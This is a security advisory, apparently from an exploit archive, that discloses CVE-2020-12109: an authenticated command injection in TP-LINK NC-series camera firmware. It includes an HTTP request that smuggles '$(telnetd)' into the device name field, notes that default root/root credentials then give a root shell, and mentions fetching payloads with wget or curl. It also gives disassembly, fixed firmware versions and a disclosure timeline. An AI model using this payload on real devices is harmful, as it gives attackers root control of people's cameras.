exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TP-LINK Cloud Cameras NCXXX Bonjour Command Injection

TP-LINK Cloud Cameras NCXXX Bonjour Command Injection
Posted May 1, 2020
Authored by Pietro Oliva

TP-LINK Cloud Cameras including products NC200, NC210, NC220, NC230, NC250, NC260, and NC450 suffer from a command injection vulnerability. The issue is located in the swSystemSetProductAliasCheck method of the ipcamera binary (Called when setting a new alias for the device via /setsysname.fcgi), where despite a check on the name length, no other checks are in place in order to prevent shell metacharacters from being introduced. The system name would then be used in swBonjourStartHTTP as part of a shell command where arbitrary commands could be injected and executed as root.

tags | exploit, arbitrary, shell, root
advisories | CVE-2020-12109
SHA-256 | 51f53a1e5bba2a9ada63d195865ebededf26762f4a245d45d4e986eb40f62c20

TP-LINK Cloud Cameras NCXXX Bonjour Command Injection

Change Mirror Download
Vulnerability title: TP-LINK Cloud Cameras NCXXX Bonjour Command Injection
Author: Pietro Oliva
CVE: CVE-2020-12109
Vendor: TP-LINK
Product: NC200, NC210, NC220, NC230, NC250, NC260, NC450
Affected version: NC200 <= 2.1.9 build 200225, NC210 <= 1.0.9 build 200304,
NC220 <= 1.3.0 build 200304, NC230 <= 1.3.0 build 200304,
NC250 <= 1.3.0 build 200304, NC260 <= 1.5.2 build 200304,
NC450 <= 1.5.3 build 200304.

Fixed version: NC200 <= 2.1.10 build 200401, NC210 <= 1.0.10 build 200401,
NC220 <= 1.3.1 build 200401, NC230 <= 1.3.1 build 200401,
NC250 <= 1.3.1 build 200401, NC260 <= 1.5.3 build_200401,
NC450 <= 1.5.4 build 200401

Description:
The issue is located in the swSystemSetProductAliasCheck method of the
ipcamera binary (Called when setting a new alias for the device via
/setsysname.fcgi), where despite a check on the name length, no other checks
are in place in order to prevent shell metacharacters from being introduced.
The system name would then be used in swBonjourStartHTTP as part of a shell
command where arbitrary commands could be injected and executed as root.

Impact:
Attackers could exploit this vulnerability to remotely execute commands as root
on affected devices.

Exploitation:
An attacker would first need to authenticate to the web interface and make a
request such as the following (the request contents might change slightly
between cameras):

POST /setsysname.fcgi HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/x-www-form-urlencoded
Cookie: sess=xxxxx
Content-Length: xxxx

sysname=$(telnetd)&token=xxxxx"

In a device where telnetd has not been removed from the release firmware (such
as NC200), this would spawn the telnetd deamon. Default root/root credentials
could then be used to obtain a root shell via telnet.

Evidence:
The disassembly of affected code from an NC200 camera is shown below:

sym.swSystemSetProductAliasCheck:

0x0049f1cc lui gp, 0xa
0x0049f1d0 addiu gp, gp, -0x3ebc
0x0049f1d4 addu gp, gp, t9
0x0049f1d8 addiu sp, sp, -0x28
0x0049f1dc sw ra, (var_24h)
0x0049f1e0 sw fp, (var_20h)
0x0049f1e4 move fp, sp
0x0049f1e8 sw gp, (var_10h)
0x0049f1ec sw a0, (alias_arg)
0x0049f1f0 lw v0, (alias_arg)
0x0049f1f4 nop
,=< 0x0049f1f8 beqz v0, 0x49f218
| 0x0049f1fc nop
| 0x0049f200 lw v0, (alias_arg)
| 0x0049f204 nop
| 0x0049f208 lb v0, (v0)
| 0x0049f20c nop
,==< 0x0049f210 bnez v0, 0x49f224
|| 0x0049f214 nop
|`-> 0x0049f218 addiu v0, zero, 0x42f
|,=< 0x0049f21c b 0x49f258
|| 0x0049f220 sw v0, (arg_18h)
`--> 0x0049f224 lw a0, (alias_arg)
| 0x0049f228 lw t9, -sym.imp.strlen(gp)
| 0x0049f22c nop
| 0x0049f230 jalr t9
| 0x0049f234 nop
| 0x0049f238 lw gp, (arg_10h)
| 0x0049f23c sltiu v0, v0, 0x81
,==< 0x0049f240 bnez v0, 0x49f254
|| 0x0049f244 nop
|| 0x0049f248 addiu v0, zero, 0x430
,===< 0x0049f24c b 0x49f258
||| 0x0049f250 sw v0, (arg_18h)
|`--> 0x0049f254 sw zero, (arg_18h)
`-`-> 0x0049f258 lw v0, (arg_18h)
0x0049f25c move sp, fp
0x0049f260 lw ra, (var_24h)
0x0049f264 lw fp, (var_20h)
0x0049f268 jr ra
0x0049f26c addiu sp, sp, 0x28

swBonjourStartHTTP:

0x0043a008 addiu v0, fp, 0x20
0x0043a00c move a0, v0
0x0043a010 addiu a1, zero, 0x88
0x0043a014 lw t9, -sym.swBonjourGetName(gp) ; <= get the system name in fp+20
0x0043a018 nop
0x0043a01c jalr t9
0x0043a020 nop
0x0043a024 lw gp, (arg_10h)
0x0043a028 addiu v0, fp, 0x20 ; <= put ptr to name in v0
0x0043a02c lw a0, -0x7fdc(gp)
0x0043a030 nop
0x0043a034 addiu a0, a0, 0xd10
; a0 => "mDNSResponderPosix -n \"%s\" -t _http._tcp -p %d -x path=/login.html &"
0x0043a038 move a1, v0 ; <= a1 points to system name
0x0043a03c lw a2, (arg_b0h)
0x0043a040 lw t9, -sym.cmCommand(gp) ; Execute the command
0x0043a044 nop
0x0043a048 jalr t9
0x0043a04c nop


Mitigating factors:
-NC210 Cameras have a filter for "bad chars". This means the payload cannot
contain any of the following characters: dot(.), at(@), dash(-), underscore(_),
whitespace( ), and single quote(').
-Some cameras do not ship with telnetd, so other methods such as using wget or
curl to download a payload from the network might be required to obtain a shell.

Remediation:
Install firmware updates provided by the vendor to fix the vulnerability.
The latest updates can be found at the following URLs:

https://www.tp-link.com/en/support/download/nc200/#Firmware
https://www.tp-link.com/en/support/download/nc210/#Firmware
https://www.tp-link.com/en/support/download/nc220/#Firmware
https://www.tp-link.com/en/support/download/nc230/#Firmware
https://www.tp-link.com/en/support/download/nc250/#Firmware
https://www.tp-link.com/en/support/download/nc260/#Firmware
https://www.tp-link.com/en/support/download/nc450/#Firmware

Disclosure timeline:
29th March 2020 - Vulnerability reported to vendor.
10th April 2020 - Patched firmware provided by vendor for verification.
10th April 2020 - Confirmed the vulnerability was fixed.
29th April 2020 - Firmware updates released to the public.
29th April 2020 - Vulnerability details are made public.


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close